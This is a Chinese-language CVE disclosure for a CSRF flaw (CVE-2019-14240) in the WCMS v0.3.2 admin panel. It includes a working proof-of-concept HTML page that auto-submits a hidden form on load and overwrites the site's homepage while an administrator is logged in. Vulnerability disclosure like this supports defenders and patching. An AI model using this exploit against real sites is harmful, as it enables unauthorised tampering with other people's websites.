CVE中文申请站

一、漏洞摘要

漏洞名称: WCMS v0.3.2后台管理页面存在CSRF漏洞
上报日期: 2019-07-12
漏洞发现者: Chen Wu
产品首页: http://wcms.space/
软件链接: https://github.com/vedees/wcms
版本: v0.3.2
CVE编号: CVE-2019-14240


二、漏洞概述

WCMS v0.3.2后台管理页面存在CSRF漏洞,管理员登陆后,打开下面poc.html可触发漏洞,篡改网站首页内容。
1.PNG

三、利用代码

当管理员登陆后,通过浏览器打开如下页面,可将首页内容改为hack test!
poc.html

<html>
  <head>
  <title> CSRF Proof</title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="http://localhost/wex/html.php?finish=../index.html" method="POST">
      <input type="hidden" name="textAreaCode" value="hack test!" />
      <input type="hidden" name="codeEditor" value="" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/266/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14240
exploit-db:发布中

标签: CSRF, WCMS